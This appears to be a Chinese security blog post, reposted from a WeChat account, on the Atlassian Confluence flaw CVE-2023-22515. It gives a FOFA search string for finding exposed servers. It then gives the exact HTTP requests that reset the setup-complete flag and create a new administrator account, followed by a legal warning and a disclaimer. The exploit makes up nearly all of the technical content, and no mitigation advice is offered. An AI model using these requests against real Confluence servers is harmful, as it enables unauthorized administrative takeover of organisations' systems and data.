Confluence未授权管理用户添加-CVE-2023-22515

admin 2023年11月8日16:42:15评论48 views字数 1231阅读4分6秒阅读模式

Atlassian Confluence是企业广泛使用的wiki系统。
2023年10月4日,Atlassian官方发布了对于CVE-2023-22515漏洞的补丁。这个漏洞是由属性覆盖导致,利用该漏洞攻击者可以重新执行Confluence安装流程并增加管理员账户。

影响版本:version>8.0.0

Confluence未授权管理用户添加-CVE-2023-22515

指纹:

fofa:app="Atlassian-Confluence"

覆盖Confluence中的bootstrapStatusProvider.applicationConfig.setupComplete属性:

GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1

Confluence未授权管理用户添加-CVE-2023-22515然后新建管理员账户

POST /setup/setupadministrator.action HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeX-Atlassian-Token: no-checkContent-Length: 122Content-Type: application/x-www-form-urlencoded
username=newadmin1&fullName=newadmin1&email=1234567123@qq.com&password=newPassword1&confirm=newPassword1&setup-next-button=Next


这一步对应的新建账户页面

Confluence未授权管理用户添加-CVE-2023-22515

成功添加:

Confluence未授权管理用户添加-CVE-2023-22515

登录:

Confluence未授权管理用户添加-CVE-2023-22515

Confluence未授权管理用户添加-CVE-2023-22515

小知识




依据《刑法》第285条第3款的规定,犯提供非法侵入或者控制计算机信息系罪的,处3年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处3年以上7年以下有期徒刑,并处罚金。

Confluence未授权管理用户添加-CVE-2023-22515

声明



本文提供的技术参数仅供学习或运维人员对内部系统进行测试提供参考,未经授权请勿用本文提供的技术进行破坏性测试,利用此文提供的信息造成的直接或间接损失,由使用者承担。

Confluence未授权管理用户添加-CVE-2023-22515

欢迎 在看留言分享至朋友圈 三连

 好文推荐  

原文始发于微信公众号(丁永博的成长日记):Confluence未授权管理用户添加-CVE-2023-22515

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月8日16:42:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Confluence未授权管理用户添加-CVE-2023-22515https://cn-sec.com/archives/2186785.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息